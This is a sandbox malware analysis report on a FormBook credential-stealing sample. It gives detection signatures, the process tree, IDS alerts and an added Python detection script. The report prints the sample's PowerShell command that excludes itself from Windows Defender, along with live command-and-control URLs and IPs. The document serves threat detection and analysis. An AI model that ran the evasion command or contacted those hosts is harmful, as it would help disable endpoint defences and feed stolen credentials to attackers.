
Windows Analysis Report
ungziped_file.exe

Overview

General Information

Sample name: ungziped_file.exe
Analysis ID: 1633496
MD5: 6f13805c98ed6dda5477de5faeb268d2
SHA1: a97271661fc2232adef9e0bccdde338d7c1c5a0c
SHA256: d489cef2aa2d00dadb98bc10e6dc58dd4d2f43e33d089839a43eca2527b67fd1
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Child Processes Of SndVol.exe
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ungziped_file.exe (PID: 6292 cmdline: "C:\Users\user\Desktop\ungziped_file.exe" MD5: 6F13805C98ED6DDA5477DE5FAEB268D2)
    • powershell.exe (PID: 6604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5156 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • ungziped_file.exe (PID: 6648 cmdline: "C:\Users\user\Desktop\ungziped_file.exe" MD5: 6F13805C98ED6DDA5477DE5FAEB268D2)
    • ungziped_file.exe (PID: 6724 cmdline: "C:\Users\user\Desktop\ungziped_file.exe" MD5: 6F13805C98ED6DDA5477DE5FAEB268D2)
      • K1A8707LwM6.exe (PID: 764 cmdline: "C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\eRowTUp2uMcFB.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • SndVol.exe (PID: 2100 cmdline: "C:\Windows\SysWOW64\SndVol.exe" MD5: BD4A1CC3429ED1251E5185A72501839B)
          • K1A8707LwM6.exe (PID: 6128 cmdline: "C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\JBQ6QqyExLQU.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 7148 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • svchost.exe (PID: 5880 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000010.00000002.3512102451.0000000005040000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000011.00000002.3514314819.00000000052F0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.1396809453.00000000010D0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.1393148021.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000010.00000002.3509810870.00000000032A0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
5.2.ungziped_file.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
5.2.ungziped_file.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ungziped_file.exe", ParentImage: C:\Users\user\Desktop\ungziped_file.exe, ParentProcessId: 6292, ParentProcessName: ungziped_file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe", ProcessId: 6604, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ungziped_file.exe", ParentImage: C:\Users\user\Desktop\ungziped_file.exe, ParentProcessId: 6292, ParentProcessName: ungziped_file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe", ProcessId: 6604, ProcessName: powershell.exe
Source: Process started | Author: X__Junior (Nextron Systems) | Data: Command: "C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\JBQ6QqyExLQU.exe" , CommandLine: "C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\JBQ6QqyExLQU.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe, NewProcessName: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe, OriginalFileName: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe, ParentCommandLine: "C:\Windows\SysWOW64\SndVol.exe", ParentImage: C:\Windows\SysWOW64\SndVol.exe, ParentProcessId: 2100, ParentProcessName: SndVol.exe, ProcessCommandLine: "C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\JBQ6QqyExLQU.exe" , ProcessId: 6128, ProcessName: K1A8707LwM6.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ungziped_file.exe", ParentImage: C:\Users\user\Desktop\ungziped_file.exe, ParentProcessId: 6292, ParentProcessName: ungziped_file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe", ProcessId: 6604, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5880, ProcessName: svchost.exe
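The Sigma hits above reduce to two process-creation patterns: powershell.exe adding a Defender exclusion (here for the parent's own image path, so the dropper whitelists itself) and SndVol.exe, which never launches programs, appearing as a parent. The Python below is an added example and is not part of the Joe Sandbox report or of the Sigma rules it cites. It runs both checks over constructed events that mirror the process tree above, and it reimplements the Sigma base64offset modifier so that the cmdlet is still caught when it is hidden in -EncodedCommand (UTF-16LE, which is what PowerShell actually encodes). The event field names, the severity labels, the benign explorer.exe event and the encoded-command event are assumptions.

```python
"""Process-creation triage for the two Sigma-style patterns the report flags.
Added example; events are constructed to mirror the report's process tree."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Set


@dataclass
class ProcEvent:
    pid: int
    image: str          # full path of the new process
    cmdline: str
    parent_pid: int
    parent_image: str   # full path of the parent process


@dataclass
class Finding:
    pid: int
    rule: str
    severity: str
    detail: str


def base64offset_patterns(needle: str) -> Set[str]:
    """Reimplementation of Sigma's base64offset modifier. A substring can sit at any
    of three byte alignments inside a base64 blob, so encode it at each alignment
    and trim the leading/trailing characters that depend on neighbouring bytes.
    Both ASCII and UTF-16LE (what powershell -EncodedCommand carries) are covered."""
    patterns = set()
    for raw in (needle.encode("ascii"), needle.encode("utf-16-le")):
        for shift in range(3):
            enc = base64.b64encode(b"\x00" * shift + raw).decode("ascii")
            start = (0, 2, 3)[shift]                                  # chars tainted by the pad bytes
            end = {0: None, 1: -3, 2: -2}[(len(raw) + shift) % 3]    # chars tainted by what follows
            patterns.add(enc[start:end])
    return patterns


def encoded_command(script: str) -> str:
    """Base64 of the UTF-16LE script, exactly as powershell.exe -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


EXCLUSION_RE = re.compile(
    r"(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension|IpAddress)\s+[\"']?([^\"'\s]+)",
    re.IGNORECASE)
MPPREF_B64 = base64offset_patterns("Add-MpPreference") | base64offset_patterns("Set-MpPreference")
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\windows\\temp\\", "\\appdata\\")


def check_defender_exclusion(ev: ProcEvent) -> Optional[Finding]:
    if not ev.image.lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
        return None
    m = EXCLUSION_RE.search(ev.cmdline)
    if m:
        target = m.group(1)
        if target.lower() == ev.parent_image.lower():
            # The report's case: the parent excludes its own binary from Defender.
            return Finding(ev.pid, "defender_exclusion", "critical",
                           f"parent {ev.parent_image} excluded itself from Defender")
        sev = "high" if any(s in ev.parent_image.lower() for s in USER_WRITABLE) else "medium"
        return Finding(ev.pid, "defender_exclusion", sev,
                       f"exclusion for {target} added by {ev.parent_image}")
    if any(p in ev.cmdline for p in MPPREF_B64):
        return Finding(ev.pid, "defender_exclusion_encoded", "high",
                       "Add/Set-MpPreference inside a base64-encoded command line")
    return None


def check_sndvol_child(ev: ProcEvent) -> Optional[Finding]:
    """SndVol.exe (the volume mixer) launches nothing; a child means it was hollowed."""
    if ev.parent_image.lower().endswith("\\sndvol.exe"):
        return Finding(ev.pid, "sndvol_child_process", "high",
                       f"{ev.image} spawned by SndVol.exe (pid {ev.parent_pid})")
    return None


def triage(events: List[ProcEvent]) -> List[Finding]:
    findings = []
    for ev in events:
        for check in (check_defender_exclusion, check_sndvol_child):
            f = check(ev)
            if f:
                findings.append(f)
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STAGE_DIR = r"C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc"

# Constructed events: the first three mirror the report's process tree, the last two
# (a benign admin query and an encoded exclusion) are invented for contrast.
SAMPLE_EVENTS = [
    ProcEvent(6604, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              f'"{PS}" Add-MpPreference -ExclusionPath "C:\\Users\\user\\Desktop\\ungziped_file.exe"',
              6292, r"C:\Users\user\Desktop\ungziped_file.exe"),
    ProcEvent(6128, STAGE_DIR + r"\K1A8707LwM6.exe", f'"{STAGE_DIR}\\JBQ6QqyExLQU.exe"',
              2100, r"C:\Windows\SysWOW64\SndVol.exe"),
    ProcEvent(7148, r"C:\Program Files\Mozilla Firefox\Firefox.exe",
              r'"C:\Program Files\Mozilla Firefox\Firefox.exe"', 2100, r"C:\Windows\SysWOW64\SndVol.exe"),
    ProcEvent(7200, PS, f'"{PS}" -NoProfile Get-MpPreference', 4012, r"C:\Windows\explorer.exe"),
    ProcEvent(7300, PS, f'"{PS}" -NoP -W Hidden -EncodedCommand '
              + encoded_command(r'Add-MpPreference -ExclusionPath "C:\ProgramData\svc.exe"'),
              7288, r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.severity:8}] pid {f.pid} {f.rule}: {f.detail}")
```

The self-exclusion check (exclusion target equal to the parent image) is the highest-confidence variant: an administrator excluding a folder from explorer.exe or an RMM agent looks nothing like a fresh binary on the Desktop excluding itself. Note that a plain-text regex alone would miss the encoded event; only the base64offset patterns catch it.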
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-10T12:29:23.240625+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49691 | 192.186.58.31 | 80 | TCP
2025-03-10T12:29:47.311808+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49696 | 92.60.36.190 | 80 | TCP
2025-03-10T12:30:39.620666+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49700 | 188.114.97.3 | 80 | TCP
2025-03-10T12:30:53.046505+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49704 | 144.76.229.203 | 80 | TCP
2025-03-10T12:31:08.029327+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49708 | 103.42.144.142 | 80 | TCP
2025-03-10T12:31:21.694047+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49712 | 13.248.169.48 | 80 | TCP
2025-03-10T12:31:34.930737+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49716 | 13.248.169.48 | 80 | TCP
2025-03-10T12:31:48.997119+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49720 | 129.226.111.122 | 80 | TCP
2025-03-10T12:32:02.221350+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49725 | 84.32.84.32 | 80 | TCP
2025-03-10T12:32:15.561140+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49730 | 192.64.118.221 | 80 | TCP
2025-03-10T12:32:28.942512+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49734 | 198.187.31.216 | 80 | TCP
2025-03-10T12:32:43.718001+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49738 | 47.83.1.90 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-10T12:29:39.669957+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49693 | 92.60.36.190 | 80 | TCP
2025-03-10T12:29:42.236524+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49694 | 92.60.36.190 | 80 | TCP
2025-03-10T12:29:44.755640+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49695 | 92.60.36.190 | 80 | TCP
2025-03-10T12:29:53.883736+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49697 | 188.114.97.3 | 80 | TCP
2025-03-10T12:29:56.430795+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49698 | 188.114.97.3 | 80 | TCP
2025-03-10T12:29:58.981191+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49699 | 188.114.97.3 | 80 | TCP
2025-03-10T12:30:45.344968+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49701 | 144.76.229.203 | 80 | TCP
2025-03-10T12:30:47.897961+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49702 | 144.76.229.203 | 80 | TCP
2025-03-10T12:30:50.487038+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49703 | 144.76.229.203 | 80 | TCP
2025-03-10T12:31:00.087481+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49705 | 103.42.144.142 | 80 | TCP
2025-03-10T12:31:02.698050+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49706 | 103.42.144.142 | 80 | TCP
2025-03-10T12:31:05.284159+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49707 | 103.42.144.142 | 80 | TCP
2025-03-10T12:31:13.890073+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49709 | 13.248.169.48 | 80 | TCP
2025-03-10T12:31:16.592684+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49710 | 13.248.169.48 | 80 | TCP
2025-03-10T12:31:19.125917+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49711 | 13.248.169.48 | 80 | TCP
2025-03-10T12:31:27.268982+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49713 | 13.248.169.48 | 80 | TCP
2025-03-10T12:31:29.802311+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49714 | 13.248.169.48 | 80 | TCP
2025-03-10T12:31:32.375883+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49715 | 13.248.169.48 | 80 | TCP
2025-03-10T12:31:41.251816+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49717 | 129.226.111.122 | 80 | TCP
2025-03-10T12:31:43.790577+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49718 | 129.226.111.122 | 80 | TCP
2025-03-10T12:31:46.428961+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49719 | 129.226.111.122 | 80 | TCP
2025-03-10T12:31:54.582326+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49721 | 84.32.84.32 | 80 | TCP
2025-03-10T12:31:57.135568+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49722 | 84.32.84.32 | 80 | TCP
2025-03-10T12:31:59.693529+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49724 | 84.32.84.32 | 80 | TCP
2025-03-10T12:32:07.877338+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49727 | 192.64.118.221 | 80 | TCP
2025-03-10T12:32:10.458729+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49728 | 192.64.118.221 | 80 | TCP
2025-03-10T12:32:13.015428+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49729 | 192.64.118.221 | 80 | TCP
2025-03-10T12:32:21.309958+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49731 | 198.187.31.216 | 80 | TCP
2025-03-10T12:32:24.406079+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49732 | 198.187.31.216 | 80 | TCP
2025-03-10T12:32:26.408163+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49733 | 198.187.31.216 | 80 | TCP
2025-03-10T12:32:35.572269+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49735 | 47.83.1.90 | 80 | TCP
2025-03-10T12:32:38.120224+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49736 | 47.83.1.90 | 80 | TCP
2025-03-10T12:32:40.665733+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 49737 | 47.83.1.90 | 80 | TCP


AV Detection

Source: http://www.82765.ltd/extg/?lJ5XsHT=FWqvS2oQh4eVVjLTwqHOiP1/ZDahyJOFPrLBskdMkfQ4EQGcFlX+4xYLIEJWX9Ikcmr6BUKh66LrzwmKZjSBvM+s0cQ6GZ0SyzALVkZ6YWBvCGXcxA==&qRn=in70LLMxeJE | Avira URL Cloud: Label: phishing
Source: http://www.031235246.xyz/an37/?lJ5XsHT=EOo17e0b13RAPxLblUgE3vs/FGL0H2xQV++ddtKGVI4dgn5cY1anvW0mUjQ935dHimnK6XuAvySysVP8xdezbz8F+SECfhZPlRZkAyQ7l3udob86xw==&qRn=in70LLMxeJE | Avira URL Cloud: Label: malware
Source: http://www.gnlokn.info/1hqx/?lJ5XsHT=ZLrw+Pq3MAwYsBOK5aec2k9VcgoVTWhUmUFDAd6oEVMHtXmwVeeiiz1QtAZkDwNggiXkqMWrizc2pYhIMWZKSKpIcV1JHS4R90wxBwHFuk78kAQCAA==&qRn=in70LLMxeJE | Avira URL Cloud: Label: malware
Source: http://www.fluffymooncat.fun/72e1/?lJ5XsHT=GAwPJ2y3utP2ohmBjxJQ4YKR4a5ZSZwwUjgEd0RFRLhwJQk7ldoPr0N9YZF0OFh8/8cxs0GCaqpBUanGilFHUrd1+LLzaEdk0in9+JAQ7h4qhpgqGg==&qRn=in70LLMxeJE | Avira URL Cloud: Label: malware
Source: http://www.gnlokn.info/1hqx/ | Avira URL Cloud: Label: malware
Source: ungziped_file.exe | Virustotal: Detection: 38%
Source: ungziped_file.exe | ReversingLabs: Detection: 50%
Source: Yara match | File source: 5.2.ungziped_file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.ungziped_file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000010.00000002.3512102451.0000000005040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3514314819.00000000052F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1396809453.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1393148021.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3509810870.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3512178205.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1400004101.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3512080555.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: ungziped_file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ungziped_file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: SndVol.pdbGCTL | source: K1A8707LwM6.exe, 0000000F.00000002.3510669412.00000000007CE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: ungziped_file.exe, 00000005.00000002.1397449431.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000010.00000003.1401922869.000000000504E000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3512354987.0000000005200000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3512354987.000000000539E000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000010.00000003.1393117076.0000000004E9B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: ungziped_file.exe, ungziped_file.exe, 00000005.00000002.1397449431.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, SndVol.exe, 00000010.00000003.1401922869.000000000504E000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3512354987.0000000005200000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3512354987.000000000539E000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000010.00000003.1393117076.0000000004E9B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: SndVol.pdb | source: K1A8707LwM6.exe, 0000000F.00000002.3510669412.00000000007CE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: K1A8707LwM6.exe, 0000000F.00000000.1319299130.0000000000CEF000.00000002.00000001.01000000.0000000C.sdmp, K1A8707LwM6.exe, 00000011.00000002.3510839344.0000000000CEF000.00000002.00000001.01000000.0000000C.sdmp
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_032BC7E0 FindFirstFileW,FindNextFileW,FindClose, 16_2_032BC7E0
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 4x nop then xor eax, eax 16_2_032A9F10
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 4x nop then mov ebx, 00000004h 16_2_055504DE

Networking

Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49700 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49698 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49718 -> 129.226.111.122:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49693 -> 92.60.36.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49695 -> 92.60.36.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49710 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49709 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49733 -> 198.187.31.216:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49738 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49712 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49737 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49715 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49703 -> 144.76.229.203:80
